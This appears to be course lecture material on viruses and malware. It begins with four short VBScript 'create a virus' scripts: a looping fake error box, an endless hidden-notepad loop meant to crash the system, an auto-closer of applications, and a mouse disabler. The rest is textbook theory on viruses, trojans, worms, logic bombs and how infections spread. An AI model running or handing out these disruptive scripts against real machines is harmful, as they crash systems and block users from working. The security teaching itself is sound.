15 Viruses and Malware
Hiteishi Diwanji
Create a virus:
- 1) Open notepad type the following and save it as fakemsg.vbs do msgbox “System Error : 423” loop
- This script displays a message box with the message “System Error : 432”
- The message box gets invoked again and again if it is being closed. To run vbs script
- Go to start -> Run -> type the full path with script name.
Output:
To stop the script:
- l To stop a script running under Wscript, you need to stop the process in Windows Task Manager.
- l Open Task Manager (right-click the taskbar and select Task Manager, or type taskmgr in the Run dialog box).
- l On the Processes tab select wscript.exe and press End Process.
Check wsscript.exe:
- 2) Crash System :Open notepad type the following and save it as crashsystem.vbs set ws=CreateObject(“wscript.shell”) do ws.run “notepad”,0
loop
- This program will infinitely open notepad in hidden mode causing system memory to overload crash…!
- The value “0” in the third line specifies the mode in which the application should run, here it is hidden mode.
3) Close applications automatically within 5 seconds Open notepad type the following and save it as autoclose.vbs set ws=CreateObject(“wscript.shell”) do ws.sendkeys “%{F4}” wscript.sleep 5000
loop
l This script automatically close any opened Applications within 5 seconds
l Specify a larger time value by changing the line “wscript.sleep 5000”
l To close within 15 seconds then change the value from “5000” to “15000”.
4) Disable The Mouse
Open notepad type the following and save it as disablemouse.vbs set ws=Createobject(“wscript.shell”) for i=1 to 4 ws.run “WISPTIS.EXE”,0 next l This script temporarily disables the mouse functionality.Why worry about Malicious code?
- l Malicious code behaves in unexpected way.
- l Malicious code can write a message on computer screen,stop a running program,generate a sound or erase a stored file.
- l Malicious code can do nothing – planted, lie dormant, undetected until some event triggers the code to act. Trigger can be time or date, an event, a condition, a count or combination.
Kinds of malicious code:
- l Malicious code or rogue program is the general name for Unanticipated or Undesired effects in programs or program parts, caused by an agent with intent on Damage.
- l The agent is the writer of the program or the person who causes its distribution.
Virus:
- l A virus is a program that can replicate itself and pass on malicious code to other nonmalicious programs by modifying them.
Transient virus | Resident virus |
Transient virus has a life that depends on | Resident virus locates itself in memory ; |
the life of its host; virus runs when its | then it can remain active or be activated as |
attached program executes and terminates | a stand alone program, even after its |
when its attached program ends. | attached program ends. |
Trojan horse:
l Gets automatically installed along with an infected legitimate program.
l Once installed on target machine, it can perform various malicious operations like deleting files, transmitting files to intruder, modifying files, installing other programs that provide unauthorized access and execute privilege elevation attacks.
Malicious codes:
- Logic bomb- a class of malicious code that runs when a specified condition occur.
- Time bomb – a logic bomb whose trigger is time or date.
- Trapdoor or backdoor – someone can access the program with special privileges
The number 990099 in an automated bank teller program might allow to process the log of everyone’s transactions at the machine.
- A worm is a program that spreads copies of itself through a network.
- Rabbit is a virus or worm that self replicates without bound. It tries to exhaust the resources.
A rabbit might create copies of itself and store them on the disk to completely fill the disk.
Difference between virus and worm:
- A worm operates through networks and a virus can spread through any medium.
- Worm spreads copies of itself as a stand alone program, virus spreads copies of itself as a program that attaches to or embeds in other programs.
How viruses attach:
- Virus may be on CD, when executed virus copies itself on permanent storage.
- Virus is attached to E-mail. Virus writer convince the victim to open the attachment.
- Appended viruses: A virus program attaches itself to a program, whenever the program is run, the virus is activated.
- Viruses that surround a program: Virus is attached to original program but has control before and after execution. Virus writer wants to prevent virus from being detected. If virus is stored on disk, the filename or its size may help in detection. Virus writer attaches virus to the program that constructs listing of files on disk. If virus regains control after the listing program that generated list but before the listing is displayed or printed, the virus could eliminate its entry from listing.
- Integrated viruses and replacementsVirus replaces some of the targets and integrate itself into the original code of the target.
Document viruses:
- l Implemented within a formatted document, such as a written document,a database, a slide presentation, a picture or a spreadsheet.
- l These documents are highly strucutred file that contain both data and commands(included in macros,variables,procedures,file accesses and system calls).
- l The virus writer can use any feature of document to perform malicious country.
How viruses gain control:
- l Virus (V) is to be invoked instead of target(T).
Homes for viruses:
The virus writer may find these qualities appealing in a virus:
• It is hard to detect.
• It is not easily destroyed or deactivated.
• It spreads infection widely.
• It can reinfect its home program or other programs.
• It is easy to create.
• It is machine independent and operating system independent.
How viruses gain control:
- l Many viruses are transmitted by e-mail, using either of two routes.
- l In the first case, some virus writers generate a new e-mail message to all addresses in the victim’s address book. These new messages contain a copy of the virus so that it propagates widely.
- The new first recipient opens the attachment from a friend. For example, the subject line or message body may read “I thought you might enjoy this picture from our vacation.“
- l In the second case, the virus writer can leave the infected file for the victim to forward unknowingly. If the virus’s effect is not immediately obvious, the victim may pass the infected file unwittingly to other victims.
Viral residence – One-Time Execution:
- l The majority of viruses today execute only once, spreading their infection and causing their effect in that one execution.
- l A virus often arrives as an e-mail attachment of a document virus. It is executed just by being opened.
Viral residence – Boot Sector Viruses:
- When a computer starts, control begins with firmware that determines which hardware components are present, tests them, and transfers control to an operating system.
- After the hardware test, operating systems, is invoked dynamically, perhaps even by a user’s choice, after the hardware test.
- The operating system is software stored on disk. bootstrap (often boot) load copies the operating system from disk to memory and transfers control to it; because the operating system figuratively pulls itself into memory by its bootstraps.
- The firmware does its control transfer by reading a fixed number of bytes from a fixed location on the disk called the boot sector to a fixed address in memory and then jumping to that address (which will turn out to contain the first instruction of the bootstrap loader).
- The bootstrap loader then reads into memory the rest of the operating system from disk.
- To run a different operating system, the user just inserts a disk with the new operating system and a bootstrap loader.
- When the user reboots from this new disk, the loader there brings in and runs another operating system. This same scheme is used for personal computers, workstations, and large mainframes.
- The virus gains control very early in the boot process, before most detection tools are active
- Virus can avoid, or at least complicate, detection.
- The files in the boot area are crucial parts of the operating system. To keep users from accidentally modifying or deleting them with disastrous results, the operating system makes them “invisible” by not showing them as part of a normal listing of stored files, preventing their deletion.
- The virus code is not readily noticed by users.
Viral residence – Memory-Resident Viruses:
- l Very frequently used parts of the operating system and for a few specialized user programs, code remains in memory and is called “resident” code.
- l Examples of resident code are the routine that interprets keys pressed on the keyboard, the code that handles error conditions that arise during a program’s execution, or a program that acts like an alarm clock, sounding a signal at a time the user determines.
- l Resident routines are sometimes called TSRs or “terminate and stay resident” routines.
- l Virus writers also like to attach viruses to resident code because the resident code is activated many times while the machine is running.
- l Each time the resident code runs, the virus does too. Once activated, the virus can look for and infect uninfected carriers.
- l For example, after activation, a boot sector virus might attach itself to a piece of resident code. Then, each time the virus was activated it might check whether any removable disk in a disk drive was infected and, if not, infect it.
Other Homes for Viruses:
- l One popular home for a virus is an application program. Many applications, such as word processors and spreadsheets, have a “macro” feature, by which a user can record a series of commands and repeat them with one invocation. Such programs also provide a “startup macro” that is executed every time the application is executed.
- l A virus writer can create a virus macro that adds itself to the startup directives for the application. It also then embeds a copy of itself in data files so that the infection spreads to anyone receiving one or more of those files.
- l Libraries are used by many programs, malicious code residing there will have a broad effect.
- l libraries are shared among users and transmitted from one user to another, a practice that spreads the infection.
- l Finally, executing code in a library can pass on the viral infection to other transmission media.
- l Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus control programs are good candidates for hosting viruses because they are widely shared.
Suggested Reading:
- Cryptography and Network Security Principles and Practice by William Stallings, sixth Edition, PEARSON.
- Security in Computing by Charles Pfleeger & Shari Lawrence Pfleeger, fourth Edition, PEARSON.
- Network Security by Charlie Kaufman, Radia Perlman, Mike Speciner, second Edition, PHI.
- The Complete Reference – Network Security by Roberta Bragg, Mark Rhodes-Ousley & Keith Strassberg, Tata McGraw Hill
- Network Security Bible by Eric Cole, Ronald Krutz, James Conley, Wiley
- Hacking 6 Exposed by Stuart McClure, Joel Scambray & George Kurtz , Tata McGraw Hill .
- www.snort.org
- https://nmap.org